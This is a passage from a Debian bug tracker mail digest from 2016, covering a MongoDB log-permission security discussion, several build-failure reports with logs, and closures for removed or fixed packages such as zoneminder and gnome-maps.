[1]: https://bugs.debian.org/398793
[2]: https://bugs.debian.org/782001

As a software engineer, I have to disagree here. You shouldn't assume
your software is running on locked-down environments only. If a file
might contain sensitive data, the file permissions should be set
accordingly, after all, they are setting file permissions correctly on
/var/lib/mongodb (even though they aren't setting them on
/var/log/mongodb either).

There are multiple use cases that might cause people to configure o+x
permissions on home folders and it's also what default debian sets for
home folders.

I don't think blaming users that aren't unix wizards is the right way to
deal with security, instead of having sane defaults towards security.
The worst case should be the exception instead of the norm.

If you run `ls -la ~/.*_history` most developers seem to agree with
this, given that permissions are set correctly regardless of the umask.

> > https://jira.mongodb.org/browse/SERVER-25335#comment-1342085
> >
> > The bug is locked, what do I do now?
>  You mean what to do with upstream? I guess nothing. Probably I can
> fix this myself.

Please go ahead.

This would resolve CVE-2016-6494 for the binary debian is distributing,
but there are still various downstreams for mongodb on debian and
MongoDB Inc themself that would ship without a patch.

Thanks.

Bug#833077: fastinfoset: FTBFS: Could not resolve dependencies for project com.sun.xml.fastinfoset:FastInfosetUtilities:jar:1.2.12

[Chris Lamb]

Source: fastinfoset
Version: 1.2.12-1
Severity: serious
Justification: fails to build from source
User: reproducible-bui...@lists.alioth.debian.org
Usertags: ftbfs
X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org

Dear Maintainer,

fastinfoset fails to build from source in unstable/amd64:

  [..]

  Adding debian:Global_Chambersign_Root_-_2008.pem
  Adding debian:Go_Daddy_Class_2_CA.pem
  Adding debian:Go_Daddy_Root_Certificate_Authority_-_G2.pem
  Adding debian:Hellenic_Academic_and_Research_Institutions_RootCA_2011.pem
  Adding debian:Hongkong_Post_Root_CA_1.pem
  Adding debian:IGC_A.pem
  Adding debian:IdenTrust_Commercial_Root_CA_1.pem
  Adding debian:IdenTrust_Public_Sector_Root_CA_1.pem
  Adding debian:Izenpe.com.pem
  Adding debian:Juur-SK.pem
  Adding debian:Microsec_e-Szigno_Root_CA.pem
  Adding debian:Microsec_e-Szigno_Root_CA_2009.pem
  Adding debian:NetLock_Arany_=Class_Gold=_Főtanúsítvány.pem
  Adding debian:NetLock_Business_=Class_B=_Root.pem
  Adding debian:NetLock_Express_=Class_C=_Root.pem
  Adding debian:NetLock_Notary_=Class_A=_Root.pem
  Adding debian:NetLock_Qualified_=Class_QA=_Root.pem
  Adding debian:Network_Solutions_Certificate_Authority.pem
  Adding debian:OISTE_WISeKey_Global_Root_GA_CA.pem
  Adding debian:OISTE_WISeKey_Global_Root_GB_CA.pem
  Adding debian:PSCProcert.pem
  Adding debian:QuoVadis_Root_CA.pem
  Adding debian:QuoVadis_Root_CA_1_G3.pem
  Adding debian:QuoVadis_Root_CA_2.pem
  Adding debian:QuoVadis_Root_CA_2_G3.pem
  Adding debian:QuoVadis_Root_CA_3.pem
  Adding debian:QuoVadis_Root_CA_3_G3.pem
  Adding debian:RSA_Security_2048_v3.pem
  Adding debian:Root_CA_Generalitat_Valenciana.pem
  Adding debian:S-TRUST_Authentication_and_Encryption_Root_CA_2005_PN.pem
  Adding debian:S-TRUST_Universal_Root_CA.pem
  Adding debian:SecureSign_RootCA11.pem
  Adding debian:SecureTrust_CA.pem
  Adding debian:Secure_Global_CA.pem
  Adding debian:Security_Communication_EV_RootCA1.pem
  Adding debian:Security_Communication_RootCA2.pem
  Adding debian:Security_Communication_Root_CA.pem
  Adding debian:Sonera_Class_1_Root_CA.pem
  Adding debian:Sonera_Class_2_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_EV_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_Root_CA.pem
  Adding debian:Staat_der_Nederlanden_Root_CA_-_G2.pem
  Adding debian:Staat_der_Nederlanden_Root_CA_-_G3.pem
  Adding debian:Starfield_Class_2_CA.pem
  Adding debian:Starfield_Root_Certificate_Authority_-_G2.pem
  Adding debian:Starfield_Services_Root_Certificate_Authority_-_G2.pem
  Adding debian:StartCom_Certification_Authority.pem
  Adding debian:StartCom_Certification_Authority_2.pem
  Adding debian:StartCom_Certification_Authority_G2.pem
  Adding debian:SwissSign_Gold_CA_-_G2.pem
  Adding debian:SwissSign_Platinum_CA_-_G2.pem
  Adding debian:SwissSign_Silver_CA_-_G2.pem
  Adding debian:Swisscom_Root_CA_1.pem
  Adding debian:Swisscom_Root_CA_2.pem
  Adding debian:Swisscom_Root_EV_CA_2.pem
  Adding debian:T-TeleSec_GlobalRoot_Class_2.pem
  Adding debian:T-TeleSec_GlobalRoot_Class_3.pem
  Adding debian:TC_TrustCenter_Class_3_CA_II.pem
  Adding debian:TURKTRUST_Certificate_Services_Provider_Root_2007.pem
  Adding debian:TWCA_Global_Root_CA.pem
  Adding debian:TWCA_Root_Certification_Authority.pem
  Adding debian:Taiwan_GRCA.pem
  Adding debian:TeliaSonera_Root_CA_v1.pem
  Adding debian:Trustis_FPS_Root_CA.pem
  Adding debian:TÜBİTAK_UEKAE_Kök_Sertifika_Hizmet_Sağlayıcısı_-_Sürüm_3.pem
  Adding debian:TÜRKTRUST_Elektronik_Sertifika_Hizmet_Sağlayıcısı_H5.pem
  Adding debian:TÜRKTRUST_Elektronik_Sertifika_Hizmet_Sağlayıcısı_H6.pem
  Adding debian:USERTrust_ECC_Certification_Authority.pem
  Adding debian:USERTrust_RSA_Certification_Authority.pem
  Adding debian:UTN_USERFirst_Email_Root_CA.pem
  Adding debian:UTN_USERFirst_Hardware_Root_CA.pem
  Adding debian:VeriSign_Class_3_Public_Primary_Certification_Authority_-_G4.pem
  Adding debian:VeriSign_Class_3_Public_Primary_Certification_Authority_-_G5.pem
  Adding debian:VeriSign_Universal_Root_Certification_Authority.pem
  Adding debian:Verisign_Class_1_Public_Primary_Certification_Authority.pem
  Adding debian:Verisign_Class_1_Public_Primary_Certification_Authority_-_G2.pem
  Adding debian:Verisign_Class_1_Public_Primary_Certification_Authority_-_G3.pem
  Adding debian:Verisign_Class_2_Public_Primary_Certification_Authority_-_G2.pem
  Adding debian:Verisign_Class_2_Public_Primary_Certification_Authority_-_G3.pem
  Adding debian:Verisign_Class_3_Public_Primary_Certification_Authority.pem
  Adding debian:Verisign_Class_3_Public_Primary_Certification_Authority_-_G2.pem
  Adding debian:Verisign_Class_3_Public_Primary_Certification_Authority_-_G3.pem
  Adding debian:Verisign_Class_3_Public_Primary_Certification_Authority_2.pem
  Adding debian:Visa_eCommerce_Root.pem
  Adding debian:WellsSecure_Public_Root_Certificate_Authority.pem
  Adding debian:WoSign.pem
  Adding debian:WoSign_China.pem
  Adding debian:XRamp_Global_CA_Root.pem
  Adding debian:certSIGN_ROOT_CA.pem
  

Bug#833076: mate-indicator-applet: FTBFS: ./autogen.sh: 80: shift: can't shift that many

[Chris Lamb]

Source: mate-indicator-applet
Version: 1.14.1-1
Severity: serious
Justification: fails to build from source
User: reproducible-bui...@lists.alioth.debian.org
Usertags: ftbfs
X-Debbugs-Cc: reproducible-bui...@lists.alioth.debian.org

Dear Maintainer,

mate-indicator-applet fails to build from source in unstable/amd64:

  [..]

  Setting up libharfbuzz-icu0:amd64 (1.2.7-1) ...
  Setting up gsettings-desktop-schemas (3.20.0-3) ...
  Setting up libdrm-dev:amd64 (2.4.70-1) ...
  Setting up libx11-6:amd64 (2:1.6.3-1) ...
  Setting up libatk1.0-dev (2.20.0-1) ...
  Setting up libxcb-sync1:amd64 (1.11.1-1) ...
  Setting up libx11-xcb1:amd64 (2:1.6.3-1) ...
  Setting up x11proto-xext-dev (7.3.0-1) ...
  Setting up libfreetype6-dev (2.6.3-3+b1) ...
  Setting up libice-dev:amd64 (2:1.0.9-1+b1) ...
  Setting up glib-networking:amd64 (2.48.2-1) ...
  Setting up libxcomposite1:amd64 (1:0.4.4-1) ...
  Setting up libxcb-shm0:amd64 (1.11.1-1) ...
  Setting up libxcb-shape0:amd64 (1.11.1-1) ...
  Setting up libxrender1:amd64 (1:0.9.9-2) ...
  Setting up libxcb1-dev:amd64 (1.11.1-1) ...
  Setting up libxcb-glx0-dev:amd64 (1.11.1-1) ...
  Setting up libavahi-client3:amd64 (0.6.32-1) ...
  Setting up libx11-dev:amd64 (2:1.6.3-1) ...
  Setting up libxft2:amd64 (2.3.2-1) ...
  Setting up libharfbuzz-dev:amd64 (1.2.7-1) ...
  Setting up libxcb-sync-dev:amd64 (1.11.1-1) ...
  Setting up fontconfig (2.11.0-6.4) ...
  Regenerating fonts cache... done.
  Setting up libcups2:amd64 (2.1.4-4) ...
  Setting up libegl1-mesa:amd64 (11.2.2-1) ...
  Setting up libfontconfig1-dev:amd64 (2.11.0-6.4) ...
  Setting up libx11-xcb-dev:amd64 (2:1.6.3-1) ...
  Setting up libsm-dev:amd64 (2:1.2.2-1+b1) ...
  Setting up libxext6:amd64 (2:1.3.3-1) ...
  Setting up libxfixes3:amd64 (1:5.0.2-1) ...
  Setting up libatspi2.0-0:amd64 (2.20.2-1) ...
  Setting up x11proto-fixes-dev (1:5.0-2) ...
  Setting up libgdk-pixbuf2.0-0:amd64 (2.34.0-1) ...
  Setting up libxcb-shm0-dev:amd64 (1.11.1-1) ...
  Setting up libsoup2.4-1:amd64 (2.54.1-1) ...
  Setting up gir1.2-gdkpixbuf-2.0:amd64 (2.34.0-1) ...
  Setting up libxrender-dev:amd64 (1:0.9.9-2) ...
  Setting up libsoup-gnome2.4-1:amd64 (2.54.1-1) ...
  Setting up libxcb-dri2-0-dev:amd64 (1.11.1-1) ...
  Setting up libxcb-render0-dev:amd64 (1.11.1-1) ...
  Setting up x11proto-damage-dev (1:1.2.1-2) ...
  Setting up libxft-dev (2.3.2-1) ...
  Setting up gtk-update-icon-cache (3.20.6-2) ...
  Setting up libgdk-pixbuf2.0-dev (2.34.0-1) ...
  Setting up libxcb-dri3-dev:amd64 (1.11.1-1) ...
  Setting up libxcursor1:amd64 (1:1.1.14-1+b1) ...
  Setting up libxext-dev:amd64 (2:1.3.3-1) ...
  Setting up libpango-1.0-0:amd64 (1.40.1-1) ...
  Setting up libwayland-egl1-mesa:amd64 (11.2.2-1) ...
  Setting up libxcb-shape0-dev:amd64 (1.11.1-1) ...
  Setting up libatk-bridge2.0-0:amd64 (2.20.1-2) ...
  Setting up librest-0.7-0:amd64 (0.8.0-1) ...
  Setting up libxxf86vm1:amd64 (1:1.1.4-1) ...
  Setting up libxxf86vm-dev:amd64 (1:1.1.4-1) ...
  Setting up libxfixes-dev:amd64 (1:5.0.2-1) ...
  Setting up x11proto-composite-dev (1:0.4.2-2) ...
  Setting up libxrandr2:amd64 (2:1.5.0-1) ...
  Setting up libxi6:amd64 (2:1.7.6-1) ...
  Setting up gir1.2-atspi-2.0 (2.20.2-1) ...
  Setting up libcairo2:amd64 (1.14.6-1+b1) ...
  Setting up libxinerama1:amd64 (2:1.1.3-1+b1) ...
  Setting up libxcursor-dev:amd64 (1:1.1.14-1+b1) ...
  Setting up libxcb-randr0-dev:amd64 (1.11.1-1) ...
  Setting up libxdamage1:amd64 (1:1.1.4-2+b1) ...
  Setting up libxrandr-dev:amd64 (2:1.5.0-1) ...
  Setting up libxcomposite-dev (1:0.4.4-1) ...
  Setting up libcairo-script-interpreter2:amd64 (1.14.6-1+b1) ...
  Setting up libxcb-xfixes0-dev:amd64 (1.11.1-1) ...
  Setting up libcairo-gobject2:amd64 (1.14.6-1+b1) ...
  Setting up libxdamage-dev:amd64 (1:1.1.4-2+b1) ...
  Setting up libxtst6:amd64 (2:1.2.2-1+b1) ...
  Setting up libpangoft2-1.0-0:amd64 (1.40.1-1) ...
  Setting up libxinerama-dev:amd64 (2:1.1.3-1+b1) ...
  Setting up libxcb-present-dev:amd64 (1.11.1-1) ...
  Setting up libxi-dev (2:1.7.6-1) ...
  Setting up libcairo2-dev (1.14.6-1+b1) ...
  Setting up gir1.2-freedesktop:amd64 (1.48.0-3) ...
  Setting up libpangoxft-1.0-0:amd64 (1.40.1-1) ...
  Setting up libpangocairo-1.0-0:amd64 (1.40.1-1) ...
  Setting up gir1.2-pango-1.0:amd64 (1.40.1-1) ...
  Setting up libxtst-dev:amd64 (2:1.2.2-1+b1) ...
  Setting up libegl1-mesa-dev:amd64 (11.2.2-1) ...
  Setting up libpango1.0-dev (1.40.1-1) ...
  Setting up librsvg2-2:amd64 (2.40.16-1) ...
  Setting up libatspi2.0-dev (2.20.2-1) ...
  Setting up librsvg2-common:amd64 (2.40.16-1) ...
  Setting up libatk-bridge2.0-dev:amd64 (2.20.1-2) ...
  Setting up adwaita-icon-theme (3.20-3) ...
  update-alternatives: using /usr/share/icons/Adwaita/cursor.theme to provide 
/usr/share/icons/default/index.theme (x-cursor-theme) in auto mode
  Setting up libgtk-3-common (3.20.6-2) ...
  Setting up libgtk-3-0:amd64 (3.20.6-2) ...
  Setting up libido3-0.1-0 (0.3.4-1.1) ...
  Setting up libindicator3-7:amd64 (0.5.0-3) ...

Bug#830842: State of Maps in Stable

[James Rowan Lloyd]

Hi,

I understand that this bug has been fixed upstream in the latest version 
that is set to hit unstable. However, given that this bug affects all 
versions, including stable, I'm wondering if there is any plan to patch 
it and fix it in jessie. It's a pretty horrendous bug for an application 
that is part of a default gnome-desktop task on a fresh installation of 
debian stable to be basically completely unusable. Obviously I'm 
contacting you because I like gnome-maps I would like it working on my 
system sooner than whenever stretch is released, but it's still bad from 
a objective perspective for this bug not to be fixed in stable. Please 
consider and let me know.



Thanks, James


jlloy...@me.com

Bug#789739: marked as done (libdevel-ebug-perl: FTBFS in sid: test failures)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 13:42:06 +
with message-id 
and subject line Bug#832725: Removed package(s) from unstable
has caused the Debian Bug report #789739,
regarding libdevel-ebug-perl: FTBFS in sid: test failures
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
789739: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=789739
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: libdevel-ebug-perl
Version: 0.56-1
Severity: serious
Justification: FTBFS

This package FTBFS in a clean sid sbuild setup:

#   Failed test 'run to end'
#   at /usr/share/perl5/Test/Expect.pm line 86.
#  got: 'Program finished. Enter 'restart' or 'q'r'
# expected: 'Program finished. Enter 'restart' or 'q''
# Looks like you failed 1 test of 19.
t/ebug.t . 



not ok 10 # TODO Hmm... I broke the return...
#   Failed (TODO) test at t/return.t line 37.
#  got: '15'
# expected: '3.141'

Cheers,
Dominic.
--- End Message ---
--- Begin Message ---
Version: 0.56-1+rm

Dear submitter,

as the package libdevel-ebug-perl has just been removed from the Debian archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/832725

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---

Bug#787446: marked as done (libdevel-findref-perl: FTBFS with perl 5.22)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 13:41:29 +
with message-id 
and subject line Bug#832724: Removed package(s) from unstable
has caused the Debian Bug report #787446,
regarding libdevel-findref-perl: FTBFS with perl 5.22
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
787446: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=787446
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: libdevel-findref-perl
Version: 1.440-1
Severity: important
User: debian-p...@lists.debian.org
Usertags: perl-5.22-transition
Forwarded: https://rt.cpan.org/Public/Bug/Display.html?id=101077

This package FTBFS with perl 5.22:

x86_64-linux-gnu-gcc -c   -D_REENTRANT -D_GNU_SOURCE -DDEBIAN -fwrapv -fno-stric
t-aliasing -pipe -I/usr/local/include -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
 -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -D_FORTIFY_SOU
RCE=2   -DVERSION=\"1.44\" -DXS_VERSION=\"1.44\" -fPIC "-I/usr/lib/x86_64-linux-
gnu/perl/5.22.0/CORE"   FindRef.c
In file included from /usr/lib/x86_64-linux-gnu/perl/5.22.0/CORE/perl.h:3733:0,
 from FindRef.xs:2:
FindRef.xs: In function 'XS_Devel__FindRef_find_':
/usr/lib/x86_64-linux-gnu/perl/5.22.0/CORE/pad.h:319:33: error: 'SV' has no memb
er named 'xpadn_ourstash'
 #define PadnameOURSTASH(pn) (pn)->xpadn_ourstash
 ^
/usr/lib/x86_64-linux-gnu/perl/5.22.0/CORE/pad.h:342:27: note: in expansion of m
acro 'PadnameOURSTASH'
 #define SvPAD_OUR(pn)  (!!PadnameOURSTASH(pn))
   ^
FindRef.xs:106:56: note: in expansion of macro 'SvPAD_OUR'
 if (SvTYPE (sv) == SVt_PVMG && SvPAD_OUR (sv))
^
FindRef.xs:240:39: warning: format '%d' expects argument of type 'int', but argu
ment 2 has type 'STRLEN' [-Wformat=]
   res_pair (form ("the target for the lvalu
e array element #%d,", LvTARGOFF (sv)));
   ^
FindRef.xs:243:35: warning: format '%d' expects argument of type 'int', but argu
ment 3 has type 'STRLEN' [-Wformat=]
   res_pair (form ("an lvalue reference target (
type '%c', ofs %d, len %d),",
   ^
FindRef.xs:243:35: warning: format '%d' expects argument of type 'int', but argu
ment 4 has type 'STRLEN' [-Wformat=]
make[1]: *** [FindRef.o] Error 1
Makefile:330: recipe for target 'FindRef.o' failed
make[1]: Leaving directory '/«PKGBUILDDIR»'
dh_auto_build: make -j1 returned exit code 2
make: *** [build-arch] Error 2


Cheers,
Dominic.
--- End Message ---
--- Begin Message ---
Version: 1.440-1+rm

Dear submitter,

as the package libdevel-findref-perl has just been removed from the Debian 
archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/832724

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---

Bug#789433: marked as done (libtest-checkchanges-perl: FTBFS with perl 5.22: tries to use Module::Build::Version)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 13:42:48 +
with message-id 
and subject line Bug#832726: Removed package(s) from unstable
has caused the Debian Bug report #789433,
regarding libtest-checkchanges-perl: FTBFS with perl 5.22: tries to use 
Module::Build::Version
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
789433: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=789433
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: libtest-checkchanges-perl
Version: 0.14-2
Severity: important
User: debian-p...@lists.debian.org
Usertags: perl-5.22-transition
Tags: sid stretch

This package FTBFS with perl 5.22 (currently in experimental), since
Module::Build has been removed from perl core:

perl Build test --verbose 1
Can't locate Module/Build/Version.pm in @INC (you may need to install the 
Module::Build::Version module) (@INC contains: /«PKGBUILDDIR»/blib/lib 
/«PKGBUILDDIR»/blib/arch /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.22.0 
/usr/local/share/perl/5.22.0 /usr/lib/x86_64-linux-gnu/perl5/5.22 
/usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl/5.22 /usr/share/perl/5.22 
/usr/local/lib/site_perl /usr/lib/x86_64-linux-gnu/perl-base .) at 
/«PKGBUILDDIR»/blib/lib/Test/CheckChanges.pm line 123.
# Looks like your test exited with 2 before it could output anything.
t/changes.t . 
1..1

The fix is to add a build dependency on libmodule-build-perl.

This bug will become release critical nearer the time of the perl 5.22
migration, expected during the (northern hemisphere) summer.

Cheers,
Dominic.
--- End Message ---
--- Begin Message ---
Version: 0.14-2+rm

Dear submitter,

as the package libtest-checkchanges-perl has just been removed from the Debian 
archive
unstable we hereby close the associated bug reports.  We are sorry
that we couldn't deal with your issue properly.

For details on the removal, please see https://bugs.debian.org/832726

The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.

This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmas...@ftp-master.debian.org.

Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)--- End Message ---

Bug#831984: marked as done (zoneminder: modifies shipped file: /usr/share/zoneminder/www/api/app/Config/core.php)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 11:18:44 +
with message-id 
and subject line Bug#831984: fixed in zoneminder 1.30.0+dfsg-1
has caused the Debian Bug report #831984,
regarding zoneminder: modifies shipped file: 
/usr/share/zoneminder/www/api/app/Config/core.php
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
831984: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831984
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: zoneminder
Version: 1.30.0~rc2+dfsg-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package modifies a shipped
file:

1m41.6s ERROR: FAIL: debsums reports modifications inside the chroot:
  /usr/share/zoneminder/www/api/app/Config/core.php

Whatever you are trying to achieve here, this is *wrong*.


Andreas


zoneminder_1.30.0~rc2+dfsg-1.log.gz
Description: application/gzip
--- End Message ---
--- Begin Message ---
Source: zoneminder
Source-Version: 1.30.0+dfsg-1

We believe that the bug you reported is fixed in the latest version of
zoneminder, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Dmitry Smirnov  (supplier of updated zoneminder package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Sun, 31 Jul 2016 20:24:37 +1000
Source: zoneminder
Binary: zoneminder zoneminder-doc
Architecture: source amd64 all
Version: 1.30.0+dfsg-1
Distribution: unstable
Urgency: medium
Maintainer: Dmitry Smirnov 
Changed-By: Dmitry Smirnov 
Description:
 zoneminder - video camera security and surveillance solution
 zoneminder-doc - ZoneMinder documentation
Closes: 831984
Changes:
 zoneminder (1.30.0+dfsg-1) unstable; urgency=medium
 .
   * New upstream release [July 2016].
   * Do not modify shipped "core.php" (Closes: #831984).
 Thanks, Chris Lamb and Andreas Beckmann.
   * Removed obsolete/broken "zmstreamer.8" symlink.
   * Tightened versioned dependency on "debhelper".
Checksums-Sha1:
 c88a63e4ee4905ee25adcc28df83ec4c5d2e4cbc 2547 zoneminder_1.30.0+dfsg-1.dsc
 e97c3806de356a5c32318b81b2b769d83c7612e1 8403400 
zoneminder_1.30.0+dfsg.orig.tar.xz
 820022d9f05df56f096cb13a24524063d63aa9ce 22288 
zoneminder_1.30.0+dfsg-1.debian.tar.xz
 e8b408c9a35fed1935d4e733c12d91d4b79d68dd 15955226 
zoneminder-dbgsym_1.30.0+dfsg-1_amd64.deb
 6f367543210016e731152a9f313eb47527bcda8c 5280876 
zoneminder-doc_1.30.0+dfsg-1_all.deb
 d8fbc4c8663dc0c864dd6f5ebb9d26e40acf99d4 4591088 
zoneminder_1.30.0+dfsg-1_amd64.deb
Checksums-Sha256:
 b10f23a782977ee5185ef5f198b66c350686b8eafd19d21f06c78cbb852ae023 2547 
zoneminder_1.30.0+dfsg-1.dsc
 ba9af998f3bf26f5ec9d87ad5e91b57f58f5ab143c1d12586dfd3eb4c95b1521 8403400 
zoneminder_1.30.0+dfsg.orig.tar.xz
 732b4e7f2ac83b9277b8dc5b673d483bc244f36598f604050281c0b32bbbd6ea 22288 
zoneminder_1.30.0+dfsg-1.debian.tar.xz
 9ad7441795cce33c0ff8e8aecc8605f71c8a6497c3c691da539243dc7a43f76c 15955226 
zoneminder-dbgsym_1.30.0+dfsg-1_amd64.deb
 2cbd43a6c236e504dfafb8231f4015ec039c9c9d5915f4b00da5d2ece163449b 5280876 
zoneminder-doc_1.30.0+dfsg-1_all.deb
 4d4f54816350d62cedfddc45965b5e917f18345bf07c5f5e302fc41827802a7f 4591088 
zoneminder_1.30.0+dfsg-1_amd64.deb
Files:
 97bf91f86724e60ba7ec24dc0d9d3f19 2547 net optional zoneminder_1.30.0+dfsg-1.dsc
 acf856a8d337fec4934fff27322aaad3 8403400 net optional 
zoneminder_1.30.0+dfsg.orig.tar.xz
 576c6ef56789efcb8c601baf7ab48e3b 22288 net optional 
zoneminder_1.30.0+dfsg-1.debian.tar.xz
 7367339a088ac8c36b30d9373a96d62b 15955226 debug extra 
zoneminder-dbgsym_1.30.0+dfsg-1_amd64.deb
 2c8e9e88fa869e4d913ba10fd64ed36b 5280876 doc optional 
zoneminder-doc_1.30.0+dfsg-1_all.deb
 f958981a588630c9ce25919f13a92c6b 4591088 net optional 
zoneminder_1.30.0+dfsg-1_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCAAGBQJXndW/AAoJEFK2u9lTlo0bNjAQAJbIfp7Fe3c0TCJHWRWFSKoP
qfWsGikDiWfJOCZ6ImY7FpkfvqK40ObiqZpQ73Ji/V6E4jE+mabu9pqsknCSddja
UBXJayaB0Ecx5JkfLwCVqfTLbqKhaWNbqDJP8jf0LLdHJmPV2CjF9JlhJnCLIgjY

Processed: Bug#831984 tagged as pending

[Debian Bug Tracking System]

Processing commands for cont...@bugs.debian.org:

> tag 831984 pending
Bug #831984 [zoneminder] zoneminder: modifies shipped file: 
/usr/share/zoneminder/www/api/app/Config/core.php
Added tag(s) pending.
> --
Stopping processing here.

Please contact me if you need assistance.
-- 
831984: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=831984
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

Bug#831984: Bug#830979: Bug#831984: zoneminder: modifies shipped file: /usr/share/zoneminder/www/api/app/Config/core.php

[Dmitry Smirnov]

On Thursday, 21 July 2016 10:05:41 AM AEST Chris Lamb wrote:
> > Something like the attached patch? (Untested)
> 
> Had more time than I thought; updated and (quickly) tested patch
> attached.

Chris, thank you very much for all your help. I've incorporated your patch 
and it will be uploaded soon.

Andreas, thank you for good bug report.

-- 
Regards,
 Dmitry Smirnov.


signature.asc
Description: This is a digitally signed message part.

Bug#831984: tagged as pending

[Dmitry Smirnov]

tag 831984 pending
--

We believe that the bug #831984 you reported has been fixed in the Git
repository. You can see the commit message below and/or inspect the
commit contents at:

http://anonscm.debian.org/cgit/collab-maint/zoneminder.git/diff/?id=7dd5a0e

(This message was generated automatically by
 'git-post-receive-tag-pending-commitmsg' hook).
---
commit 7dd5a0e
Author: Dmitry Smirnov 
Date:   Sun Jul 31 10:18:34 2016

Do not modify shipped "core.php" (Closes: #831984).

 Thanks, Chris Lamb and Andreas Beckmann.

Bug#833061: dvdauthor: FTBFS with 'error: conflicting types for 'FriBidiCharType''

[John Paul Adrian Glaubitz]

Source: dvdauthor
Version: 0.7.0-1.4
Severity: serious
Justification: fails to build from source

Hello!

dvdauthor no longer builds from source. This was recently spotted on powerpcspe,
although this problem is not architecture-specific:

In file included from subreader.c:36:0:
compat.h:105:24: error: conflicting types for 'FriBidiCharType'
 #define FriBidiParType FriBidiCharType
^
In file included from /usr/include/fribidi/fribidi.h:40:0,
 from subreader.c:50:
/usr/include/fribidi/fribidi-bidi-types.h:182:3: note: previous declaration of 
'FriBidiCharType' was here
 } FriBidiCharType;
   ^
subreader.c: In function 'sub_fribidi':
subreader.c:493:11: warning: 'fribidi_log2vis' is deprecated 
[-Wdeprecated-declarations]
   (
   ^
In file included from /usr/include/fribidi/fribidi.h:35:0,
 from subreader.c:50:
/usr/include/fribidi/fribidi-deprecated.h:198:33: note: declared here
  FRIBIDI_ENTRY FriBidiLevel fribidi_log2vis (
 ^

The full build log can be found in [1].

Cheers,
Adrian

> [1] 
> https://buildd.debian.org/status/fetch.php?pkg=dvdauthor=powerpcspe=0.7.0-1.4=1469505411

--
 .''`.  John Paul Adrian Glaubitz
: :' :  Debian Developer - glaub...@debian.org
`. `'   Freie Universitaet Berlin - glaub...@physik.fu-berlin.de
  `-GPG: 62FF 8A75 84E0 2956 9546  0006 7426 3B37 F5B5 F913

Bug#830842: marked as done (gnome-maps: MapQuest direct tile access has been discontinued)

[Debian Bug Tracking System]

Your message dated Sun, 31 Jul 2016 10:48:38 +
with message-id 
and subject line Bug#830842: fixed in gnome-maps 3.20.2-1
has caused the Debian Bug report #830842,
regarding gnome-maps: MapQuest direct tile access has been discontinued
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
